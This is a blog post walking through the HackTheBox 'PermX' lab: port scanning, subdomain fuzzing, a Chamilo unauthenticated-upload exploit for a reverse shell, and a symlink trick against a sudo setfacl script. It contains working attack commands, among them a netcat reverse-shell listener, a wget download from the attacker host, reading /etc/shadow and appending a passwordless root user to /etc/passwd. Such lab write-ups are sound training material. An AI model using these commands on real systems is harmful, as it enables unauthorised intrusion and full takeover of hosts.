<!DOCTYPE html><html class="appearance-dark" lang="en"><head><meta charset="UTF-8"><title>PermX</title><meta name="description" content="scientia potentia est."><meta name="viewport" content="width=device-width, minimum-scale=1.0, maximum-scale=1.0, user-scalable=no, initial-scale=1"><!-- Google Analytics --><!-- End Google Analytics -->
<!-- Baidu Analytics --><!-- End Baidu Analytics --><link rel="icon" href="/hexo-theme-Claudia/images/favicon.jpg"><link rel="stylesheet" href="/style/common/bulma.css"><link rel="stylesheet" href="/style/base.css"><link rel="stylesheet" href="/style/common/helper.css"><script src="/js/common.js"></script><link rel="stylesheet" href="/style/post.css"><link rel="stylesheet" href="/style/themes/highlight-theme-light.css"><link rel="stylesheet" href="/style/common/jquery.fancybox.min.css"><script src="/js/highlight.pack.js"></script><meta name="description" content="
Target IP Address: 10.10.11.23
Information GatheringUsually in the Information Gathering Phase i try to get as much information as possible about the web app that i’m testing.
Nmap ScanningNmap scans network ports to determine their status (open, closed, or filtered), identifies services running on them, and detects their versions.

command used:

sudo nm.."><meta name="generator" content="Hexo 7.1.1"></head><body class="is-flex is-flex-direction-column"><header class="header-widget is-flex-shrink-0 is-hidden-mobile"><div class="container is-fullhd is-flex is-justify-content-space-between is-align-items-center is-full-height"><section class="is-hidden-mobile is-flex-shrink-0"><h2><a href="/">Rãzvan's blog</a></h2></section><h3 class="is-hidden-mobile is-family-serif is-full-height is-flex is-align-items-center is-flex-shrink-0"><div class="is-full-height" id="postTopic"><p class="is-full-height is-flex-shrink-0 is-flex is-align-items-center is-justify-content-center">PermX</p><p class="is-full-height is-flex-shrink-0 is-flex is-align-items-center is-justify-content-center">Click back to the top</p></div></h3><aside class="is-flex-shrink-0"><h3 class="is-inline-block"><a href="/">Home</a></h3><h3 class="is-inline-block"><a href="/archives">Archives</a></h3></aside></div></header><header class="is-flex header-widget is-flex-shrink-0 is-align-items-center is-justify-content-center is-hidden-tablet"><h3 class="is-inline-block"><a href="/">Home</a></h3><h3 class="is-inline-block"><a href="/archives">Archives</a></h3></header><main><main class="container is-max-widescreen content section post-page pt-4 px-4"><div class="columns is-flex-desktop is-justify-content-center is-flex-direction-row-reverse"><div class="column is-3 is-hidden-mobile"><ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#Information-Gathering"><span class="toc-text">Information Gathering</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#Nmap-Scanning"><span class="toc-text">Nmap Scanning</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#NMAP-Full-Scanning"><span class="toc-text">NMAP Full Scanning</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Services"><span class="toc-text">Services</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#TCP-22-Default-Port-for-ssh"><span class="toc-text">TCP 22 (Default Port for ssh)</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#TCP-80-Default-Port-for-HTTP"><span class="toc-text">TCP 80  (Default Port for HTTP)</span></a></li></ol></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#Subdomain-Enumeration-with-wfuzz"><span class="toc-text">Subdomain Enumeration with wfuzz</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#Exploitation"><span class="toc-text">Exploitation</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#Privilege-Escalation"><span class="toc-text">Privilege Escalation</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#Sudo-l"><span class="toc-text">Sudo -l</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#Creating-a-Symlink"><span class="toc-text">Creating a Symlink</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#Using-the-Script-to-Modify-Permissions"><span class="toc-text">Using the Script to Modify Permissions</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#Reading-the-Shadow-File"><span class="toc-text">Reading the Shadow File</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#Creating-Another-Symlink"><span class="toc-text">Creating Another Symlink</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#Modifying-etc-passwd"><span class="toc-text">Modifying &#x2F;etc&#x2F;passwd</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#Switching-to-user3"><span class="toc-text">Switching to user3</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Getting-user-root-flags"><span class="toc-text">Getting user&amp;root flags</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Why-It-Works"><span class="toc-text">Why It Works</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#Summary"><span class="toc-text">Summary</span></a></li></ol></li></ol></li></ol></div><div class="column is-9"><header class="my-4"><a href="/tags/CTF"><i class="tag post-item-tag">CTF</i></a><a href="/tags/HackTheBox"><i class="tag post-item-tag">HackTheBox</i></a><a href="/tags/Easy"><i class="tag post-item-tag">Easy</i></a></header><h1 class="mt-0 mb-1 is-family-serif" id="postTitle">PermX</h1><time class="has-text-grey" datetime="2024-07-26T15:41:52.000Z">2024-07-26</time><article class="mt-2 post-content"><p><img src="/../permx_img/1*OV1xRlh47ksLyJvmS6g4ZQ.png" alt="alt text"></p>
<p><strong>Target IP Address: 10.10.11.23</strong></p>
<h1 id="Information-Gathering"><a href="#Information-Gathering" class="headerlink" title="Information Gathering"></a>Information Gathering</h1><p>Usually in the Information Gathering Phase i try to get as much information as possible about the web app that i’m testing.</p>
<h2 id="Nmap-Scanning"><a href="#Nmap-Scanning" class="headerlink" title="Nmap Scanning"></a>Nmap Scanning</h2><p>Nmap scans network ports to determine their status (open, closed, or filtered), identifies services running on them, and detects their versions.</p>
<ul>
<li>command used:</li>
</ul>
<pre><code class="hljs bash">sudo nmap -p- -sS --min-rate 5000 --open -T5 -vvv -Pn 10.10.11.23</code></pre>

<p>→ output</p>
<pre><code class="hljs bash">PORT   STATE SERVICE REASON
22/tcp open  ssh     syn-ack ttl 63
80/tcp open  http    syn-ack ttl 63</code></pre>

<h2 id="NMAP-Full-Scanning"><a href="#NMAP-Full-Scanning" class="headerlink" title="NMAP Full Scanning"></a>NMAP Full Scanning</h2><ul>
<li>command used:(scanning the ports we got)</li>
</ul>
<pre><code class="hljs bash">└─$ nmap -A -sC -sV -p22,80  10.10.11.23 -Pn</code></pre>

<p>→ output:</p>
<pre><code class="hljs bash">PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   256 e2:5c:5d:8c:47:3e:d8:72:f7:b4:80:03:49:86:6d:ef (ECDSA)
|_  256 1f:41:02:8e:6b:17:18:9c:a0:ac:54:23:e9:71:30:17 (ED25519)
80/tcp open  http    Apache httpd 2.4.52
|_http-server-header: Apache/2.4.52 (Ubuntu)
|_http-title: Did not follow redirect to http://permx.htb
Service Info: Host: 127.0.0.1; OS: Linux; CPE: cpe:/o:linux:linux_kernel</code></pre>

<h2 id="Services"><a href="#Services" class="headerlink" title="Services"></a>Services</h2><h3 id="TCP-22-Default-Port-for-ssh"><a href="#TCP-22-Default-Port-for-ssh" class="headerlink" title="TCP 22 (Default Port for ssh)"></a>TCP 22 (Default Port for ssh)</h3><p>-&gt; SSH package version - Might be able to find the OS and version.</p>
<p>-&gt; SSH key fingerprint - Has the key been re-used somewhere (Another machine? Same machine, just another port&#x2F;service?)</p>
<p>-&gt; SSH banner - Any text (if at all) before the password prompt (often get legal warnings about connecting to it)</p>
<p>-&gt; SSH package version:</p>
<pre><code class="hljs bash">└─$ nc -vn 10.10.11.23 22
(UNKNOWN) [10.10.11.23] 22 (ssh) open
SSH-2.0-OpenSSH_8.9p1 Ubuntu-3ubuntu0.10</code></pre>

<p>-&gt; SSH key fingerprint:</p>
<pre><code class="hljs bash">ssh root@10.10.11.23 
The authenticity of host <span class="hljs-string">&#x27;10.10.11.23 (10.10.11.23)&#x27;</span> can<span class="hljs-string">&#x27;t be established.</span>
<span class="hljs-string">ED25519 key fingerprint is SHA256:u9/wL+62dkDBqxAG3NyMhz/2FTBJlmVC1Y1bwaNLqGA.</span>
<span class="hljs-string">This key is not known by any other names.</span>
<span class="hljs-string">Are you sure you want to continue connecting (yes/no/[fingerprint])?</span></code></pre>

<h3 id="TCP-80-Default-Port-for-HTTP"><a href="#TCP-80-Default-Port-for-HTTP" class="headerlink" title="TCP 80  (Default Port for HTTP)"></a>TCP 80  (Default Port for HTTP)</h3><p>Firstly we need to add the domain to &#x2F;etc&#x2F;hosts</p>
<ul>
<li><blockquote>
<p>Web Server:</p>
</blockquote>
</li>
</ul>
<pre><code class="hljs bash">└─$ curl -i http://permx.htb | <span class="hljs-built_in">head</span> -n 50
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
  0     0    0     0    0     0      0      0 --:--:-- --:--:-- --:--:--     0HTTP/1.1 200 OK
Date: Fri, 26 Jul 2024 11:21:57 GMT
Server: Apache/2.4.52 (Ubuntu)
Last-Modified: Sat, 20 Jan 2024 14:59:26 GMT
ETag: <span class="hljs-string">&quot;8d56-60f61d7bd0f80&quot;</span>
Accept-Ranges: bytes
Content-Length: 36182
Vary: Accept-Encoding
Content-Type: text/html

&lt;!DOCTYPE html&gt;
&lt;html lang=<span class="hljs-string">&quot;en&quot;</span>&gt;

&lt;<span class="hljs-built_in">head</span>&gt;
    &lt;meta charset=<span class="hljs-string">&quot;utf-8&quot;</span>&gt;
    &lt;title&gt;eLEARNING&lt;/title&gt;
    &lt;meta content=<span class="hljs-string">&quot;width=device-width, initial-scale=1.0&quot;</span> name=<span class="hljs-string">&quot;viewport&quot;</span>&gt;
    &lt;meta content=<span class="hljs-string">&quot;&quot;</span> name=<span class="hljs-string">&quot;keywords&quot;</span>&gt;
    &lt;meta content=<span class="hljs-string">&quot;&quot;</span> name=<span class="hljs-string">&quot;description&quot;</span>&gt;

    &lt;!-- Favicon --&gt;
    &lt;<span class="hljs-built_in">link</span> href=<span class="hljs-string">&quot;img/favicon.ico&quot;</span> rel=<span class="hljs-string">&quot;icon&quot;</span>&gt;

    &lt;!-- Google Web Fonts --&gt;
    &lt;<span class="hljs-built_in">link</span> rel=<span class="hljs-string">&quot;preconnect&quot;</span> href=<span class="hljs-string">&quot;https://fonts.googleapis.com&quot;</span>&gt;
    &lt;<span class="hljs-built_in">link</span> rel=<span class="hljs-string">&quot;preconnect&quot;</span> href=<span class="hljs-string">&quot;https://fonts.gstatic.com&quot;</span> crossorigin&gt;
    &lt;<span class="hljs-built_in">link</span> href=<span class="hljs-string">&quot;https://fonts.googleapis.com/css2?family=Heebo:wght@400;500;600&amp;family=Nunito:wght@600;700;800&amp;display=swap&quot;</span> rel=<span class="hljs-string">&quot;stylesheet&quot;</span>&gt;

    &lt;!-- Icon Font Stylesheet --&gt;
    &lt;<span class="hljs-built_in">link</span> href=<span class="hljs-string">&quot;https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.10.0/css/all.min.css&quot;</span> rel=<span class="hljs-string">&quot;stylesheet&quot;</span>&gt;
    &lt;<span class="hljs-built_in">link</span> href=<span class="hljs-string">&quot;https://cdn.jsdelivr.net/npm/bootstrap-icons@1.4.1/font/bootstrap-icons.css&quot;</span> rel=<span class="hljs-string">&quot;stylesheet&quot;</span>&gt;

    &lt;!-- Libraries Stylesheet --&gt;
    &lt;<span class="hljs-built_in">link</span> href=<span class="hljs-string">&quot;lib/animate/animate.min.css&quot;</span> rel=<span class="hljs-string">&quot;stylesheet&quot;</span>&gt;
    &lt;<span class="hljs-built_in">link</span> href=<span class="hljs-string">&quot;lib/owlcarousel/assets/owl.carousel.min.css&quot;</span> rel=<span class="hljs-string">&quot;stylesheet&quot;</span>&gt;

    &lt;!-- Customized Bootstrap Stylesheet --&gt;
    &lt;<span class="hljs-built_in">link</span> href=<span class="hljs-string">&quot;css/bootstrap.min.css&quot;</span> rel=<span class="hljs-string">&quot;stylesheet&quot;</span>&gt;

    &lt;!-- Template Stylesheet --&gt;
    &lt;<span class="hljs-built_in">link</span> href=<span class="hljs-string">&quot;css/style.css&quot;</span> rel=<span class="hljs-string">&quot;stylesheet&quot;</span>&gt;
&lt;/head&gt;

&lt;body&gt;
    &lt;!-- Spinner Start --&gt;
    &lt;div <span class="hljs-built_in">id</span>=<span class="hljs-string">&quot;spinner&quot;</span> class=<span class="hljs-string">&quot;show bg-white position-fixed translate-middle w-100 vh-100 top-50 start-50 d-flex align-items-center justify-content-center&quot;</span>&gt;
        &lt;div class=<span class="hljs-string">&quot;spinner-border text-primary&quot;</span> style=<span class="hljs-string">&quot;width: 3rem; height: 3rem;&quot;</span> role=<span class="hljs-string">&quot;status&quot;</span>&gt;
            &lt;span class=<span class="hljs-string">&quot;sr-only&quot;</span>&gt;Loading...&lt;/span&gt;
        &lt;/div&gt;
    &lt;/div&gt;
 36 36182   36 13025    0     0  89494      0 --:--:-- --:--:-- --:--:-- 89827
curl: (23) Failure writing output to destination, passed 13280 returned 3104
</code></pre>

<h1 id="Subdomain-Enumeration-with-wfuzz"><a href="#Subdomain-Enumeration-with-wfuzz" class="headerlink" title="Subdomain Enumeration with wfuzz"></a>Subdomain Enumeration with wfuzz</h1><p>Wfuzz was used for subdomain enumeration to identify hidden subdomains.</p>
<ul>
<li>command used:</li>
</ul>
<pre><code class="hljs bash">└─$ wfuzz -w SecLists/Discovery/DNS/subdomains-top1million-110000.txt -H <span class="hljs-string">&quot;HOST: FUZZ.permx.htb&quot;</span> -u http://permx.htb --hw 1053 --hl 9</code></pre>

<p>→ output:(found 2 subdomains)</p>
<pre><code class="hljs bash">=====================================================================
ID           Response   Lines    Word       Chars       Payload                                                                                                          
=====================================================================

000000001:   200        586 L    2466 W     36182 Ch    <span class="hljs-string">&quot;www - www&quot;</span>                                                                                                      
000000477:   200        352 L    940 W      19347 Ch    <span class="hljs-string">&quot;lms - lms&quot;</span></code></pre>

<p><a target="_blank" rel="noopener" href="http://www.permx.htb/">www.permx.htb</a></p>
<p>lms.permx.htb</p>
<ul>
<li>let’s add them to &#x2F;etc&#x2F;hosts</li>
</ul>
<p><img src="/../permx_img/1.png" alt="alt text"></p>
<p>The <code>lms</code> subdomain has some sort of Login form:</p>
<p><img src="/../permx_img/2.png" alt="alt text"></p>
<p>I wanted to start fuzzing but a simple thing i like to do when i am testing web apps is to check the &#x2F;robots.txt directory:</p>
<p><img src="/../permx_img/3.png" alt="alt text"></p>
<p>Note</p>
<pre><code class="hljs bash"><span class="hljs-comment"># Directories</span>

Disallow: /app/
Disallow: /bin/
Disallow: /documentation/
Disallow: /home/
Disallow: /main/
Disallow: /plugin/
Disallow: /tests/
Disallow: /vendor/

<span class="hljs-comment"># Files</span>
Disallow: /license.txt
Disallow: /README.txt
Disallow: /whoisonline.php
Disallow: /whoisonlinesession.php</code></pre>

<p>Started searching each directory and on <strong>&#x2F;documentation</strong> we found the version of Chamilo:</p>
<p><img src="/../permx_img/4.png" alt="alt text"></p>
<p>We should check for exploits now</p>
<ul>
<li>Found this one: (unauthenticated-big-upload)</li>
</ul>
<p><a target="_blank" rel="noopener" href="https://github.com/m3m0o/chamilo-lms-unauthenticated-big-upload-rce-poc">https://github.com/m3m0o/chamilo-lms-unauthenticated-big-upload-rce-poc</a></p>
<p><strong>We are going to abuse this to get a reverse shell to our machine:</strong></p>
<ul>
<li>commands used to get a revshell:</li>
</ul>
<pre><code class="hljs bash">nc -lvnp 4444 

python3 main.py -u http://example.com/chamilo -a revshell</code></pre>

<p>→ Got the reverse shell:</p>
<p><img src="/../permx_img/5.png" alt="alt text"></p>
<p>We found a user named <code>mtz</code> in &#x2F;home file, i guess we will connect to this user with ssh later on:</p>
<p><img src="/../permx_img/6.png" alt="alt text"></p>
<h1 id="Exploitation"><a href="#Exploitation" class="headerlink" title="Exploitation"></a>Exploitation</h1><p><strong>LinPEAS</strong> is a script used in penetration testing to automate the process of enumerating possible paths to escalate privileges on a Linux system.</p>
<p><strong>Uploading LinPEAS to &#x2F;var&#x2F;www&#x2F;html</strong></p>
<p>→ Starting a python3 http server → Uploading the file with <code>wget</code> , change executable permissions to LinPEAS file:</p>
<pre><code class="hljs bash">python3 -m http.server

wget http://10.10.14.34:8000/linpeas.sh  

<span class="hljs-built_in">chmod</span> +x linpeas.sh</code></pre>

<p>What i said earlier with user <code>mtz</code> it just turned out to be true:</p>
<p><img src="/../permx_img/7.png" alt="alt text"></p>
<p><strong>LinPEAS found a password too:</strong></p>
<p><img src="/../permx_img/8.png" alt="alt text"></p>
<p>User: <strong>mtz</strong></p>
<p>Pass: <strong>03F6lY3uXAP2bkW8</strong></p>
<h1 id="Privilege-Escalation"><a href="#Privilege-Escalation" class="headerlink" title="Privilege Escalation"></a>Privilege Escalation</h1><p><strong>Trying to connect with ssh to user mtz with the password that we just found</strong></p>
<ul>
<li>command used:</li>
</ul>
<pre><code class="hljs bash">└─$ ssh mtz@10.10.11.23</code></pre>

<p>It worked:</p>
<p><img src="/../permx_img/9.png" alt="alt text"></p>
<h3 id="Sudo-l"><a href="#Sudo-l" class="headerlink" title="Sudo -l"></a><strong>Sudo -l</strong></h3><p>The <code>sudo -l</code> command lists the permitted (and forbidden) commands for the invoking user, helping to identify potential privilege escalation vectors on a Linux system during a penetration test.</p>
<p>→ output:</p>
<pre><code class="hljs bash">mtz@permx:~$ sudo -l
Matching Defaults entries <span class="hljs-keyword">for</span> mtz on permx:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty

User mtz may run the following commands on permx:
    (ALL : ALL) NOPASSWD: /opt/acl.sh</code></pre>

<p>We can run <strong>&#x2F;opt&#x2F;acl.sh</strong> without password.</p>
<p>This is the script:</p>
<pre><code class="hljs bash"><span class="hljs-meta">#!/bin/bash</span>

<span class="hljs-keyword">if</span> [ <span class="hljs-string">&quot;<span class="hljs-variable">$#</span>&quot;</span> -ne 3 ]; <span class="hljs-keyword">then</span>
    /usr/bin/echo <span class="hljs-string">&quot;Usage: <span class="hljs-variable">$0</span> user perm file&quot;</span>
    <span class="hljs-built_in">exit</span> 1
<span class="hljs-keyword">fi</span>

user=<span class="hljs-string">&quot;<span class="hljs-variable">$1</span>&quot;</span>
perm=<span class="hljs-string">&quot;<span class="hljs-variable">$2</span>&quot;</span>
target=<span class="hljs-string">&quot;<span class="hljs-variable">$3</span>&quot;</span>

<span class="hljs-keyword">if</span> [[ <span class="hljs-string">&quot;<span class="hljs-variable">$target</span>&quot;</span> != /home/mtz/* || <span class="hljs-string">&quot;<span class="hljs-variable">$target</span>&quot;</span> == *..* ]]; <span class="hljs-keyword">then</span>
    /usr/bin/echo <span class="hljs-string">&quot;Access denied.&quot;</span>
    <span class="hljs-built_in">exit</span> 1
<span class="hljs-keyword">fi</span>

<span class="hljs-comment"># Check if the path is a file</span>
<span class="hljs-keyword">if</span> [ ! -f <span class="hljs-string">&quot;<span class="hljs-variable">$target</span>&quot;</span> ]; <span class="hljs-keyword">then</span>
    /usr/bin/echo <span class="hljs-string">&quot;Target must be a file.&quot;</span>
    <span class="hljs-built_in">exit</span> 1
<span class="hljs-keyword">fi</span>

/usr/bin/sudo /usr/bin/setfacl -m u:<span class="hljs-string">&quot;<span class="hljs-variable">$user</span>&quot;</span>:<span class="hljs-string">&quot;<span class="hljs-variable">$perm</span>&quot;</span> <span class="hljs-string">&quot;<span class="hljs-variable">$target</span>&quot;</span>
</code></pre>

<p><strong>What the script does:</strong> </p>
<ol>
<li><strong>Argument Check</strong>: Ensures exactly three arguments are provided (user, permission, and file).</li>
<li><strong>Variable Assignment</strong>: Assigns the arguments to <code>user</code>, <code>perm</code>, and <code>target</code>.</li>
<li><strong>Path Validation</strong>: Checks if <code>target</code> is within <code>/home/mtz/</code> and doesn’t contain <code>..</code> to prevent directory traversal.</li>
<li><strong>File Check</strong>: Ensures the <code>target</code> is a file.</li>
<li><strong>Set ACL</strong>: Uses <code>setfacl</code> to modify Access Control List permissions for the specified <code>target</code>.</li>
</ol>
<h3 id="Creating-a-Symlink"><a href="#Creating-a-Symlink" class="headerlink" title="Creating a Symlink"></a><strong>Creating a Symlink</strong></h3><p>After some time thinking, what about linked files?</p>
<ul>
<li>command used:</li>
</ul>
<pre><code class="hljs bash"><span class="hljs-built_in">ln</span> -s /etc/shadow /home/mtz/test</code></pre>

<ul>
<li>This creates a symbolic link named <code>test</code> in the <code>/home/mtz</code> directory that points to <code>/etc/shadow</code>.</li>
<li>The <code>ln -s</code> command creates a shortcut (<code>/home/mtz/test</code>) that redirects operations to <code>/etc/shadow</code>.</li>
</ul>
<h3 id="Using-the-Script-to-Modify-Permissions"><a href="#Using-the-Script-to-Modify-Permissions" class="headerlink" title="Using the Script to Modify Permissions"></a><strong>Using the Script to Modify Permissions</strong></h3><ul>
<li>command used:</li>
</ul>
<pre><code class="hljs bash">sudo /opt/acl.sh mtz rw /home/mtz/test</code></pre>

<ul>
<li>Runs the script with <code>sudo</code>, which has the permission to execute <code>setfacl</code>.</li>
<li>The script gives the <code>mtz</code> user read and write (<code>rw</code>) permissions on the file located at <code>/home/mtz/test</code>, which is actually <code>/etc/shadow</code> due to the symlink.</li>
</ul>
<h3 id="Reading-the-Shadow-File"><a href="#Reading-the-Shadow-File" class="headerlink" title="Reading the Shadow File"></a><strong>Reading the Shadow File</strong></h3><ul>
<li>command used:</li>
</ul>
<pre><code class="hljs bash"><span class="hljs-built_in">cat</span> ./test</code></pre>

<p>→ output:</p>
<p><img src="/../permx_img/10.png" alt="alt text"></p>
<h3 id="Creating-Another-Symlink"><a href="#Creating-Another-Symlink" class="headerlink" title="Creating Another Symlink"></a>Creating Another Symlink</h3><ul>
<li>command used:</li>
</ul>
<pre><code class="hljs bash"><span class="hljs-built_in">ln</span> -s /etc/passwd /home/mtz/test</code></pre>

<p>Changes the symlink so that <code>/home/mtz/test</code> now points to <code>/etc/passwd</code>.</p>
<h3 id="Modifying-etc-passwd"><a href="#Modifying-etc-passwd" class="headerlink" title="Modifying /etc/passwd"></a><strong>Modifying <code>/etc/passwd</code></strong></h3><ul>
<li>commands used:</li>
</ul>
<pre><code class="hljs bash">sudo /opt/acl.sh mtz rw /home/mtz/test
<span class="hljs-built_in">echo</span> <span class="hljs-string">&quot;root3::0:0:root3:/root:/bin/bash&quot;</span> &gt;&gt; ./test</code></pre>

<ul>
<li>Runs the script again to modify permissions on the new symlink (<code>/etc/passwd</code>).</li>
<li>Appends <code>root3::0:0:root3:/root:/bin/bash</code> to <code>/etc/passwd</code> via the symlink.</li>
<li>This entry creates a new root user <code>root3</code> with no password.</li>
</ul>
<h3 id="Switching-to-user3"><a href="#Switching-to-user3" class="headerlink" title="Switching to user3"></a>Switching to user3</h3><ul>
<li>command used:</li>
</ul>
<pre><code class="hljs bash">su root3</code></pre>

<p>And we got root access:</p>
<p><img src="/../permx_img/11.png" alt="alt text"></p>
<h2 id="Getting-user-root-flags"><a href="#Getting-user-root-flags" class="headerlink" title="Getting user&amp;root flags"></a>Getting user&amp;root flags</h2><p>→ </p>
<pre><code class="hljs bash">root@permx:/home<span class="hljs-comment"># cd mtz</span>
root@permx:/home/mtz<span class="hljs-comment"># cat user.txt</span>
a74eb82f595d40bfee95eac992d40325
root@permx:/home/mtz<span class="hljs-comment"># cd /root</span>
root@permx:~<span class="hljs-comment"># cat root.txt</span>
f3683cd32f888793455237a5451cc4e9</code></pre>

<p>User.txt Flag: <code>a74eb82f595d40bfee95eac992d40325</code></p>
<p>Root.txt Flag: <code>f3683cd32f888793455237a5451cc4e9</code></p>
<h2 id="Why-It-Works"><a href="#Why-It-Works" class="headerlink" title="Why It Works"></a>Why It Works</h2><ul>
<li><strong>Symlink Trick</strong>: By creating symbolic links, you trick the script into modifying ACLs of sensitive files like <code>/etc/shadow</code> and <code>/etc/passwd</code>.</li>
<li><strong>ACL Changes</strong>: The script’s ACL modifications provide read&#x2F;write access where it’s normally restricted.</li>
<li><strong>Root Privileges</strong>: By appending a new root user entry to <code>/etc/passwd</code>, you can switch to this new user and gain root access.</li>
</ul>
<h3 id="Summary"><a href="#Summary" class="headerlink" title="Summary"></a>Summary</h3><p>→ The exploit works by abusing the script that modifies ACLs to elevate your privileges. By creating symlinks to sensitive files and using the script to alter their permissions, you can read and write to files that are usually protected. This allows you to create a new root user, giving you full control over the system.</p>
</article><section class="jump-container is-flex is-justify-content-space-between my-6"><!-- em is empty placeholder--><a class="button is-default" href="/2024/07/26/Enterprise/" title="Enterprise"><i class="iconfont icon-prev mr-2 has-text-grey"></i><span class="has-text-weight-semibold">Previous: Enterprise</span></a><a class="button is-default" href="/2024/07/26/BoardLight/" title="BoardLight"><span class="has-text-weight-semibold">Next: BoardLight</span><i class="iconfont icon-next ml-2 has-text-grey"></i></a></section></div></div></main></main><footer class="is-flex is-flex-direction-column is-align-items-center is-flex-shrink-0 is-family-serif"><section class="sns-container"><!-- Github--><!-- Ins--><!-- RSS--><!-- 知乎--><!-- 领英--><a title="linkedin" target="_blank" rel="noopener nofollow" href="//www.linkedin.com/in/razvan-popa-333740293"><i class="iconfont icon-linkedin"></i></a><!-- 脸书--></section><p><span>Copyright ©</span><span> Rãzvan 2024</span></p><div class="is-flex is-justify-content-center is-flex-wrap-wrap"><p>Powered by Hexo &verbar;&nbsp;</p><p class="is-flex is-justify-content-center"><a title="Hexo theme author" target="_blank" rel="noopener" href="//github.com/haojen">Theme by Haojen&nbsp;</a></p><div style="margin-top: 2px"><a class="github-button" title="github-button" target="_blank" rel="noopener" href="https://github.com/haojen/hexo-theme-Claudia" data-color-scheme="no-preference: light; light: light; dark: dark;" data-show-count="true"></a></div></div><div><span></span></div></footer><script async defer src="https://buttons.github.io/buttons.js"></script><script src="/js/jquery-3.6.1.min.js"></script><script src="/js/jquery-fancybox.min.js"></script><script src="/js/img_zoom.js"></script><script src="/js/post.js"></script></body></html>